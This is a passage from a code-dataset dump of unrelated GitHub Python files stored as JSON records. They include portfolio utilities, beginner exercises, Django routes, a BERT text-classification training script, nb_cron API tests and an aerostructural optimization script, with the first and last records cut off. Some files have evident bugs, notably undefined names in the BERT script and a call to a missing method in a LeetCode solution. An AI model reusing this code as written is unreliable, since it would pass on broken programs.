importe\n elif operacion == \"fondeo\":\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] += importe\n elif operacion == \"retiro\":\n cantidades.loc[cantidades.index >= fecha, \"ARS\"] -= importe\n\n return cantidades\n\n\n\n\ndef get_prices_df(prices, tickers, groups, dates, mep=None, ccl=None, conversions=None):\n if ccl is not None: ccl = ccl.copy(deep=True)\n if mep is not None: mep = mep.copy(deep=True)\n if conversions is not None: conversions = conversions.copy(deep=True)\n precios = pd.DataFrame(index=dates, columns=tickers)\n\n # Completo el df de precios historicos\n for ticker in tickers:\n tc = 1\n factor = 1\n if ticker in groups[\"cedear\"]:\n tc = ccl\n factor = conversions.loc[ticker, \"RATIO\"]\n precios[ticker] = prices[ticker][\"Close\"] * tc / factor\n precios.loc[:, \"ARS\"] = 1\n precios.loc[:, \"USD MEP\"] = mep\n\n return precios\n\n\n","repo_name":"jmarquez98/portfolio","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7915651733","text":"# Write a program that replaces words in a sentence. The input begins with word replacement pairs (original and replacement). The next line of input is the sentence where any word on the original list is replaced.\n\n# Ex: If the input is:\n# automobile car manufacturer maker children kids\n# The automobile manufacturer recommends car seats for children if the automobile doesn't already have one.\n\n# the output is:\n# The car maker recommends car seats for kids if the car doesn't already have one. \n# You can assume the original words are unique.\n\n##\n\nuser_input = input()\nnew_list = user_input.split()\nmy_list = new_list\n\nother_input = input()\nnuevo_list = other_input.split()\nmio_list = nuevo_list\n\nfor x in my_list[::2]:\n mio_list = [n.replace(x,my_list[(my_list.index(x) + 1)]) for n in mio_list]\n\nstrbl = ''\nfor n in mio_list[:-1]:\n strbl += n + ' '\n\nstrbl += mio_list[-1]\n\nprint(strbl)","repo_name":"0xzt/Python","sub_path":"Chapter 10/replace_word.py","file_name":"replace_word.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16319394650","text":"# This program is a fantasy game inventory\r\n\r\ndef displayInventory(inventory):\r\n\tprint(\"Inventory:\")\r\n\titem_total = 0\r\n\tfor k, v in inventory.items():\r\n\t\tprint (str(v) + ' ' + k)\r\n\t\titem_total += v\r\n\tprint(\"Total number of items: \" + str(item_total))\r\n\r\ndef addToInventory(inventory, addedItems):\r\n\tfor i in addedItems:\r\n\t\tinventory.setdefault(i, 0)\r\n\t\tinventory[i] += 1\r\n\treturn inventory\r\n\r\nstuff = {'rope': 1, 'torch': 6, 'gold coin': 42, 'dagger': 1, 'arrow': 12}\r\ndragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\r\n\r\nstuff = addToInventory(stuff, dragonLoot)\r\ndisplayInventory(stuff)\r\n","repo_name":"matheus-beck/python-automate-boring-stuff","sub_path":"chapter 5/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72491779346","text":"#!/usr/bin/env python\n\"\"\"\nUsage: python get_position.py []\n\nThis program reads the position of all APT controllers found, or the one\nspecified\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport time\nimport pylibftdi\nimport pyAPT\n\ndef main(args):\n print('Looking for APT controllers')\n drv = pylibftdi.Driver()\n controllers = drv.list_devices()\n\n if len(args)>1:\n serial = args[1]\n else:\n serial = None\n\n if serial:\n controllers = [x for x in controllers if x[2] == serial]\n\n if controllers:\n for con in controllers:\n print('Found %s %s S/N: %s'%con)\n with pyAPT.MTS50(serial_number=con[2]) as con:\n print('\\tPosition (mm) = %.2f [enc:%d]'%(con.position(), con.position(raw=True)))\n\n return 0\n else:\n print('\\tNo APT controllers found. Maybe you need to specify a PID')\n return 1\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n\n","repo_name":"freespace/pyAPT","sub_path":"get_position.py","file_name":"get_position.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"12580942795","text":"#!/usr/bin/python3\n\"\"\"\nListing all states that contain the letter 'a' in it\n\"\"\"\n\nfrom model_state import Base, State\nfrom sys import argv\nfrom sqlalchemy import (create_engine, text)\nfrom sqlalchemy.orm import sessionmaker\n\nif __name__ == '__main__':\n engine = create_engine(\"mysql+mysqldb://{}:{}@localhost:3306/{}\"\n .format(argv[1], argv[2], argv[3])\n )\n # MODE 1\n sql_text = text(\n \"SELECT * FROM states WHERE name LIKE '%a%' ORDER BY id ASC\"\n )\n result = engine.execute(sql_text)\n table = result.fetchall()\n for state_id, state_name in table:\n print('{}: {}'.format(state_id, state_name))\n\n # MODE 2 - Creating states object\n # Session = sessionmaker(bind=engine)\n # session = Session()\n # objects = session.query(State).filter(State.name.like('%a%')).all()\n # for obj in objects:\n # print('{}: {}'.format(obj.id, obj.name))\n","repo_name":"Uss-Momas/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73075364305","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login/', views.loginview, name='loginview'),\n path('cadastroCliente/', views.cadastroCliente, name='cadastroCliente'),\n path('cadastroConsumidor/', views.cadastroConsumidor, name='cadastroConsumidor'),\n path('home/', views.homeCliente, name='homeCliente'),\n path('homeConsumidor/', views.homeConsumidor, name='homeConsumidor'),\n path('pedido/', views.pedidoView, name='pedidoView'),\n path('relatorio/', views.relatorio, name='relatorio'),\n path('meuPerfil/', views.meuPerfil, name='meuPerfil'),\n path('editarCliente/', views.editarCliente, name='editarCliente'),\n path('editarConsumidor/', views.editarConsumidor, name='editarConsumidor'),\n path('logout/', views.logoutview, name='logoutview'),\n path('preparaCompra/', views.preparaCompra_verificalogado, name='PreparaCompra_verificalogado'),\n path('compraCredito/', views.compraCredito, name='compraCredito'),\n path('GeneratePDF/', views.GeneratePDF, name='GeneratePDF')\n]\n","repo_name":"GuilhermeYoshikawa/unipag","sub_path":"unipag/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7433910396","text":"import sys\nfrom collections import defaultdict\nfrom collections import Counter\nfrom collections import deque\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def convertToTitle(self, n: int) -> str:\n res = \"\"\n while(n != 0):\n n -= 1\n temp = n % 26\n \n res += chr(temp + 65)\n\n n = n // 26\n\n\n return res[::-1]\n \n\n\n \n\n\nif __name__ == \"__main__\":\n solution = Solution()\n nums1 = 121\n\n m = [1,2,3,4]\n\n nums2 = [1,2,3] \n n = 3\n\n result = solution.isPalindrome(nums1)\n\n #print(solution.ls)\n\n print(nums1, result)","repo_name":"geniuscynic/leetcode","sub_path":"python/168. Excel表列名称.py","file_name":"168. Excel表列名称.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40875567916","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom django.core.exceptions import MiddlewareNotUsed\n\nfrom nimbus.libs import bacula\nfrom nimbus.wizard import models\n\nclass Wizard(object):\n\n def __init__(self):\n wizard = models.Wizard.get_instance()\n if wizard.has_completed():\n bacula.unlock_bacula_and_start()\n raise MiddlewareNotUsed(\"wizard completed\")\n self.load_steps()\n\n def process_request(self, request):\n\n if not self.is_restricted_url(request):\n return None\n\n wizard = models.Wizard.get_instance()\n\n if wizard.has_completed():\n return None\n else:\n r = redirect('nimbus.wizard.views.wizard', step=\"start\")\n return r\n\n def load_steps(self):\n for app in settings.NIMBUS_WIZARD_APPS:\n __import__(app + '.views')\n\n def is_restricted_url(self, request):\n path = request.META['PATH_INFO']\n if path.startswith(\"/wizard\") or\\\n path.startswith(\"/media\") or\\\n path.startswith(\"/recovery\") or\\\n 'ajax' in path:\n return False\n return True\n","repo_name":"veezor/Nimbus","sub_path":"nimbus/wizard/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35067809644","text":"from __future__ import absolute_import, division, print_function\n\nimport argparse\nimport csv\nimport logging\nimport os\nimport random\nimport sys\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\n\nfrom torch.nn import CrossEntropyLoss, MSELoss\nfrom scipy.stats import pearsonr, spearmanr\nfrom sklearn.metrics import matthews_corrcoef, f1_score\n\nfrom pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE\nfrom pytorch_pretrained_bert.modeling import BertForSequenceClassification, BertConfig, WEIGHTS_NAME, CONFIG_NAME\nfrom pytorch_pretrained_bert.tokenization import BertTokenizer\nfrom pytorch_pretrained_bert.optimization import BertAdam, warmup_linear\n\nfrom tensorboardX import SummaryWriter\n\nfrom callback import callback\nfrom twist import distort\n# TODO: change to proper imports\nfrom data_processors import *\nfrom util_funcs import *\n\n\nlogging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt = '%m/%d/%Y %H:%M:%S',\n level = logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n ## Required parameters\n parser.add_argument(\"--data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument(\"--bert_model\", default=None, type=str, required=True,\n help=\"Bert pre-trained model selected in the list: bert-base-uncased, \"\n \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \"\n \"bert-base-multilingual-cased, bert-base-chinese.\")\n parser.add_argument(\"--task_name\",\n default=None,\n type=str,\n required=True,\n help=\"The name of the task to train.\")\n parser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n\n ## Other parameters\n parser.add_argument(\"--max_seq_length\",\n default=128,\n type=int,\n help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"\n \"Sequences longer than this will be truncated, and sequences shorter \\n\"\n \"than this will be padded.\")\n parser.add_argument(\"--do_train\",\n action='store_true',\n help=\"Whether to run training.\")\n parser.add_argument(\"--do_eval\",\n action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_lower_case\",\n action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\n parser.add_argument(\"--train_batch_size\",\n default=32,\n type=int,\n help=\"Total batch size for training.\")\n parser.add_argument(\"--eval_batch_size\",\n default=8,\n type=int,\n help=\"Total batch size for eval.\")\n parser.add_argument(\"--learning_rate\",\n default=5e-5,\n type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--num_train_epochs\",\n default=3.0,\n type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\",\n default=0.1,\n type=float,\n help=\"Proportion of training to perform linear learning rate warmup for. \"\n \"E.g., 0.1 = 10%% of training.\")\n parser.add_argument(\"--no_cuda\",\n action='store_true',\n help=\"Whether not to use CUDA when available\")\n parser.add_argument(\"--local_rank\",\n type=int,\n default=-1,\n help=\"local_rank for distributed training on gpus\")\n parser.add_argument('--gradient_accumulation_steps',\n type=int,\n default=1,\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\n parser.add_argument('--loss_scale',\n type=float, default=0,\n help=\"Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\\n\"\n \"0 (default value): dynamic loss scaling.\\n\"\n \"Positive power of 2: static loss scaling value.\\n\")\n parser.add_argument('--config_file', type=str, default='', help='The config file for the model you want to read in')\n parser.add_argument('--model_file', type=str, default='', help='The file name for the model you want to read in')\n\n parser.add_argument('--report_frequency', type=int, default=500, help=\"Number of epochs to call callback\")\n parser.add_argument('--tensorboard_log_dir', type=str, default=\"~/repo/tensorboard_data\", help=\"log_dir for tensorboard\")\n parser.add_argument(\"--run_name\", type=str, default=\"BERT\", help=\"Name of the run for tensorboard display\")\n parser.add_argument(\"--twist_frequency\", type=int, default=50, help=\"Frequency for DeepTwist; enter a nonpositive number to turn off twist_frequency\")\n parser.add_argument(\"--pretrained_weights_dir_for_training\", type=str, default=\"\", help=\"Directory of external weights to start training from\")\n args = parser.parse_args()\n\n tb_writer = SummaryWriter(log_dir=args.tensorboard_log_dir)\n\n if args.local_rank == -1 or args.no_cuda:\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n n_gpu = torch.cuda.device_count()\n else:\n torch.cuda.set_device(args.local_rank)\n device = torch.device(\"cuda\", args.local_rank)\n n_gpu = 1\n # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.distributed.init_process_group(backend='nccl')\n\n logger.info(\"device: {} n_gpu: {}, distributed training: {}\".format(\n device, n_gpu, bool(args.local_rank != -1)))\n\n if args.gradient_accumulation_steps < 1:\n raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n args.gradient_accumulation_steps))\n\n args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps\n\n SEED = 2138\n random.seed(SEED)\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n\n if n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n if not args.do_train and not args.do_eval:\n raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")\n if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:\n raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir))\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n task_name = args.task_name.lower()\n if task_name not in processors: raise ValueError(\"Task not found: %s\" % (task_name))\n\n # processors and output_modes are dicts in data_processor\n processor = processors[task_name]()\n output_mode = output_modes[task_name]\n if task_name == \"mrpc\": processor.set_logger(logger)\n\n processed_data = process_data(processor,\n output_mode,\n args.data_dir,\n args.bert_model,\n args.do_lower_case,\n args.do_train,\n args.train_batch_size,\n args.gradient_accumulation_steps,\n args.num_train_epochs)\n\n (label_list, num_labels, tokenizer,\n train_examples, num_train_optimization_steps) = processed_data\n\n\n # Prepare model\n cache_dir = os.path.join(str(PYTORCH_PRETRAINED_BERT_CACHE), 'distributed_{}'.format(args.local_rank))\n model = BertForSequenceClassification.from_pretrained(args.bert_model,\n cache_dir=cache_dir, num_labels=num_labels)\n model.to(device)\n\n if args.local_rank != -1:\n try:\n from apex.parallel import DistributedDataParallel as DDP\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n model = DDP(model)\n elif n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n if args.pretrained_weights_dir_for_training != \"\":\n with open(args.pretrained_weights_dir_for_training, \"rb\") as f:\n pretrained_weights = torch.load(f)\n model.load_state_dict(pretrained_weights)\n\n # Prepare optimizer\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n warmup=args.warmup_proportion,\n t_total=num_train_optimization_steps)\n\n global_step = 0\n nb_tr_steps = 0\n tr_loss = 0\n\n if args.do_train:\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_examples))\n logger.info(\" Batch size = %d\", args.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_optimization_steps)\n\n train_dataloader = get_dataloader(\n train_examples, label_list,\n tokenizer, output_mode,\n args.max_seq_length,\n args.local_rank,\n args.train_batch_size, logger=None)\n\n model.train()\n\n counter = 0\n total_period_loss = 0\n print(\"Reporting every \" + str(args.report_frequency) + \" batches...\")\n\n for _ in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n tr_loss = 0\n nb_tr_examples, nb_tr_steps = 0, 0\n for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\n # Deep twist\n if counter % args.twist_frequency == 0 and counter > 0 and args.twist_frequency > 0:\n distort(model, **additional_args)\n\n batch = tuple(t.to(device) for t in batch)\n input_ids, input_mask, segment_ids, label_ids = batch\n\n # define a new function to compute loss values for both output_modes\n logits = model(input_ids, segment_ids, input_mask, labels=None)\n\n if output_mode == \"classification\":\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, num_labels), label_ids.view(-1))\n elif output_mode == \"regression\":\n loss_fct = MSELoss()\n loss = loss_fct(logits.view(-1), label_ids.view(-1))\n\n if n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n loss.backward()\n\n tr_loss += loss.item()\n\n # Log to tensorboard\n counter += 1\n total_period_loss += loss.item()\n if counter % args.report_frequency == 1 and counter > args.report_frequency:\n writer_callback(counter, total_period_loss / args.report_frequency, tb_writer, args.run_name)\n total_period_loss = 0\n\n nb_tr_examples += input_ids.size(0)\n nb_tr_steps += 1\n if (step + 1) % args.gradient_accumulation_steps == 0:\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n\n # Save a trained model and the associated configuration\n model_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n output_model_file = os.path.join(args.output_dir, WEIGHTS_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n output_config_file = os.path.join(args.output_dir, CONFIG_NAME)\n with open(output_config_file, 'w') as f:\n f.write(model_to_save.config.to_json_string())\n\n # What's with the following code? Seems to save and then load the model just saved\n # # Load a trained model and config that you have fine-tuned\n # config = BertConfig(output_config_file)\n # model = BertForSequenceClassification(config, num_labels=num_labels)\n # model.load_state_dict(torch.load(output_model_file))\n\n # If we don't do_train\n elif args.model_file != \"\":\n config = BertConfig(args.config_file)\n model = BertForSequenceClassification(config, num_labels=num_labels)\n model.load_state_dict(torch.load(args.model_file))\n else:\n model = BertForSequenceClassification.from_pretrained(args.bert_model,\n cache_dir=cache_dir, num_labels=num_labels)\n\n model.to(device)\n\n if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", len(eval_examples))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_examples = processor.get_dev_examples(args.data_dir)\n eval_dataloader = get_dataloader(\n eval_examples, label_list,\n tokenizer, output_mode,\n args.max_seq_length,\n args.local_rank,\n args.eval_batch_size, logger=None)\n\n model.eval()\n eval_loss = 0\n nb_eval_steps = 0\n preds = []\n\n for input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n label_ids = label_ids.to(device)\n\n with torch.no_grad():\n logits = model(input_ids, segment_ids, input_mask, labels=None)\n\n # create eval loss and other metric required by the task\n if output_mode == \"classification\":\n loss_fct = CrossEntropyLoss()\n tmp_eval_loss = loss_fct(logits.view(-1, num_labels), label_ids.view(-1))\n elif output_mode == \"regression\":\n loss_fct = MSELoss()\n tmp_eval_loss = loss_fct(logits.view(-1), label_ids.view(-1))\n\n eval_loss += tmp_eval_loss.mean().item()\n nb_eval_steps += 1\n if len(preds) == 0:\n preds.append(logits.detach().cpu().numpy())\n else:\n preds[0] = np.append(\n preds[0], logits.detach().cpu().numpy(), axis=0)\n\n eval_loss = eval_loss / nb_eval_steps\n preds = preds[0]\n if output_mode == \"classification\":\n preds = np.argmax(preds, axis=1)\n elif output_mode == \"regression\":\n preds = np.squeeze(preds)\n result = compute_metrics(task_name, preds, all_label_ids.numpy())\n loss = tr_loss/nb_tr_steps if args.do_train else None\n\n result['eval_loss'] = eval_loss\n result['global_step'] = global_step\n result['loss'] = loss\n\n output_eval_file = os.path.join(args.output_dir, \"eval_results.txt\")\n with open(output_eval_file, \"w\") as writer:\n logger.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n\n tb_writer.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"frtennis1/cs287-project","sub_path":"run_classifier.py","file_name":"run_classifier.py","file_ext":"py","file_size_in_byte":16813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39793776490","text":"import sys\n\nimport requests\nfrom notebook.nbextensions import enable_nbextension_python, install_nbextension_python\nfrom notebook.serverextensions import toggle_serverextension_python\nfrom notebook.tests.launchnotebook import NotebookTestBase\nfrom notebook.utils import url_path_join\nfrom traitlets.config.loader import Config\n\nimport nb_cron\n\n\nclass NbCronAPI(object):\n \"\"\"Wrapper for nbconvert API calls.\"\"\"\n\n def __init__(self, base_url, token):\n self.base_url = str(base_url)\n self.token = str(token)\n\n def _req(self, verb, path, body=None, params=None):\n if body is None:\n body = {}\n\n session = requests.session()\n resp = session.get(self.base_url + '?token=' + self.token, allow_redirects=True)\n xsrf_token = None\n if '_xsrf' in session.cookies:\n xsrf_token = session.cookies['_xsrf']\n body.update({'_xsrf': xsrf_token})\n response = session.request(\n verb,\n url_path_join(self.base_url, 'cron', *path),\n data=body, params=params,\n )\n return response\n\n def get(self, path, body=None, params=None):\n return self._req('GET', path, body, params)\n\n def post(self, path, body=None, params=None):\n return self._req('POST', path, body, params)\n\n def jobs(self):\n res = self.get([\"jobs\"])\n if res is not None:\n return res.json()\n else:\n return {}\n\n\nclass NbCronAPITest(NotebookTestBase):\n def setUp(self):\n if 'nb_cron' not in sys.modules:\n sys.modules['nb_cron'] = nb_cron\n c = Config()\n c.NotebookApp.nbserver_extensions = {}\n c.NotebookApp.nbserver_extensions.update({'nb_cron': True})\n c.NotebookApp.allow_origin = '*'\n c.NotebookApp.allow_credentials = True\n c.NotebookApp.disable_check_xsrf = True\n self.config = c\n install_nbextension_python(\"nb_cron\", user=True)\n enable_nbextension_python(\"nb_cron\")\n toggle_serverextension_python(\"nb_cron\", True)\n super(NbCronAPITest, self).setUp()\n self.__class__.notebook.init_server_extension_config()\n self.__class__.notebook.init_server_extensions()\n\n # chrome_options = Options()\n # # chrome_options.add_argument(\"--headless\")\n # self.driver = webdriver.Chrome(options=chrome_options)\n # self.driver.get(self.base_url() + '?token=' + self.token)\n # self.driver.implicitly_wait(120) # seconds\n # import time\n # time.sleep(60)\n\n self.cron_api = NbCronAPI(self.base_url(), self.token)\n self.job_schedule = \"* * * * *\"\n self.job_command = \"echo\"\n self.job_comment = \"comment\"\n self.notebook_path = \"tests/python parameter test.ipynb\"\n self.create_job()\n self.job_id = len(self.cron_api.jobs()) - 1\n\n def tearDown(self):\n # self.driver.quit()\n self.remove_job(self.job_id)\n super(NbCronAPITest, self).tearDown()\n\n def create_job(self, schedule=None, command=None, comment=None):\n return self.cron_api.post([\"jobs\", str(-1),\n \"create\"],\n params={\"schedule\": schedule or self.job_schedule,\n \"command\": command or self.job_command,\n \"comment\": comment or self.job_comment})\n\n def remove_job(self, jid=None):\n return self.cron_api.post([\"jobs\", str(jid or self.job_id),\n \"remove\"])\n\n def edit_job(self, jid=None, schedule=None, command=None, comment=None):\n return self.cron_api.post([\"jobs\", str(jid or self.job_id),\n \"edit\"],\n params={\"schedule\": schedule or self.job_schedule,\n \"command\": command or self.job_command,\n \"comment\": comment or self.job_comment})\n\n def check_schedule(self, schedule=None):\n return self.cron_api.post([\"schedule\", \"check\"],\n params={\"schedule\": schedule or self.job_schedule})\n\n def extract_papermill_parameters(self, notebook_path=None):\n return self.cron_api.post([\"notebook\", \"papermill\"],\n params={\"path\": notebook_path or self.notebook_path})\n\n def test_01_job_list(self):\n jobs = self.cron_api.jobs()\n root = filter(lambda job: job[\"schedule\"] == \"* * * * *\",\n jobs[\"jobs\"])\n self.assertGreaterEqual(len(list(root)), 1)\n\n def test_02_job_create_and_remove(self):\n self.assertEqual(self.create_job().status_code, 201)\n jid = len(self.cron_api.jobs()) - 1\n self.assertEqual(self.remove_job(jid).status_code, 200)\n\n def test_03_job_create_fail(self):\n self.assertEqual(self.create_job(schedule=\" \").status_code, 422)\n self.assertEqual(self.create_job(schedule=\"* * * * * *\").status_code, 422)\n \n def test_04_job_remove_fail(self):\n self.assertEqual(self.remove_job(' ').status_code, 404)\n self.assertEqual(self.remove_job(-2).status_code, 404)\n self.assertEqual(self.remove_job(999999).status_code, 422)\n\n def test_05_job_create_edit_remove(self):\n self.assertEqual(self.create_job().status_code, 201)\n jid = len(self.cron_api.jobs()) - 1\n self.assertEqual(self.edit_job(jid, command='echo edit test').status_code, 200)\n self.assertEqual(self.remove_job(jid).status_code, 200)\n\n def test_06_job_edit_fail(self):\n self.assertEqual(self.edit_job(jid=\" \").status_code, 404)\n self.assertEqual(self.edit_job(jid=8888).status_code, 422)\n self.assertEqual(self.edit_job(command=\" \").status_code, 422)\n self.assertEqual(self.edit_job(schedule=\" \").status_code, 422)\n self.assertEqual(self.edit_job(schedule=\"* * * * * *\").status_code, 422)\n\n def test_07_job_nonsense(self):\n r = self.cron_api.post([\"jobs\", str(self.job_id), \"nonsense\"])\n self.assertEqual(r.status_code, 404)\n\n def test_08_schedule_check(self):\n self.assertEqual(self.check_schedule().status_code, 200)\n\n def test_09_schedule_check_fail(self):\n self.assertEqual(self.check_schedule(schedule=' ').status_code, 422)\n self.assertEqual(self.check_schedule(schedule='* * * * * *').status_code, 422)\n\n def test_10_extract_papermill_parameters(self):\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/python parameter test.ipynb').status_code, 200)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/spark parameter test.ipynb').status_code, 200)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/pyspark parameter test.ipynb').status_code, 200)\n\n def test_11_extract_papermill_parameters_fail(self):\n self.assertEqual(self.extract_papermill_parameters(notebook_path=' ').status_code, 422)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='test.ipynb').status_code, 422)\n","repo_name":"alexanghh/nb_cron","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35417843121","text":"\"\"\" This is the script that was used for the automated selection paper.\n\nCall as e.g. `python run_aerostruct_Q.py 1 30 100 75` to run an optimization\nThe first argument is the MDA approach index (see solver_options).\nThe second argument is the sweep angle in deg.\nThe third argument is the percentage factor to multiply the initial thickness os 2cm by.\nThe fourth argument if the percentage factor to miltiply the material E and G by.\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport sys\nfrom time import time\nimport numpy as np\n\n# Append the parent directory to the system path so we can call those Python\n# files. If you have OpenAeroStruct in your PYTHONPATH, this is not necessary.\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom OpenAeroStruct import OASProblem\n\n# Suppress warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nif __name__ == \"__main__\": \n\n # Some aircraft specs\n\n span = 28.42 # wing span in m\n root_chord = 3.34 # root chord in m\n cruise_CL = 0.607 # Cruise CL estimate\n t_ov_c = 0.14 # average t/c estimate\n MAC = 2.48 # mean aero chord\n W_wo_fuel_wbox = 25444. # Aicraft weight without fuel and wing struct\n SFC = 0.43/3600 # specific fuel consumption est\n rest_CD = 0.0142 # CD of rest of aircraft estimates\n\n\n # Mesh options\n\n nx = 3 # number of chordwise nodal points\n ny = 15 # number of spanwise nodal points for half wing\n\n\n # User inputs\n\n solver_option_index = int(sys.argv[1]) # MDA solver option index. See solver_options \n sweep_deg = int(sys.argv[2]) # Sweep angle in degrees\n thk_factor = (int(sys.argv[3])/100.) # Factor to adjust initial thickness\n stiffness_factor = (int(sys.argv[4])/100.) # Factor to adjust material stiffness\n \n # MDA approach options\n \n solver_options = ['gs_wo_aitken', 'gs_w_aitken', 'hybrid_GSN', 'newton_gmres', 'newton_direct', 'GS_then_Newton']\n solver_combo = solver_options[solver_option_index] \n solver_atol = 1e-6\n\n\n # Set problem type\n prob_dict = {'type' : 'aerostruct',\n 'optimize' : 'True',\n 'with_viscous' : True,\n # 'force_fd' : True,\n 'optimizer': 'SNOPT',\n 'cg' : np.array([30., 0., 5.]),\n 'solver_combo' : solver_combo,\n 'solver_atol' : solver_atol,\n 'print_level' : 2,\n 'Re' : 12e6, # Reynolds number\n 'reynolds_length' : MAC, # characteristic Reynolds length\n 'alpha' : 2., # [degrees] angle of attack\n 'M' : 0.5, # Mach number at cruise\n 'rho' : 0.57, # [kg/m^3] air density at 24,000 ft\n 'a' : 311., # [m/s] speed of sound at 24,000 ft\n 'g' : 9.80665, # [m/s^2] acceleration due to gravity\n # also change the 'CT' value below\n # accordingly if you alter this value\n 'CT' : SFC, # [1/s] specific fuel consumption\n 'R' : 2e6, # [m] maximum range\n 'W0' : 